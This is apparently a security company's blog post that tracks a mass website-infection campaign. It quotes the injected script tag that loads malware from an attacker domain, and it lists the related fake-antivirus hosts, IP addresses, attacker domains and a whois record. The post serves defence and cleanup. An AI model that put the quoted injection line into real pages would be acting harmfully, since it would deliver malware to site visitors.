The Hilary Kneber group is at it again. We are now tracking their usage of voip.dialistico.net to push malware to quite a few sites. If you don’t know about them, just take a look at our blog history. Most of the mass attacks we posted were controlled and created by them.
All the infected sites have this malware:
<script src="http://voip.dialistico.net/products/voip.php”..
Which is generated by a large string of encoded PHP added to all files in a site. If your site got hacked, we have a clean up solution here: https://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html. Some details here too: MW:GDD:3.
The above code loads malware from www4.pc-guard-soft6.net, which is hosted at 69.57.173.221 (from unique-protection.com – famous fake AV site).
And the whois for dialistico.net:
Domain name: dialistico.net
Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
usAdministrative Contact:
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us
This IP is hosted 77.78.239.53, which was also the home of recent attacks:
myblindstudioinfoonline.com
meqashoppercom.com
insomniaboldinfocom.com
voip.dialistico.net
We will post more details when we get them.
Is your site hacked? Visit http://sucuri.net and we will clean up the mess for you.
1 comment
Comments are closed.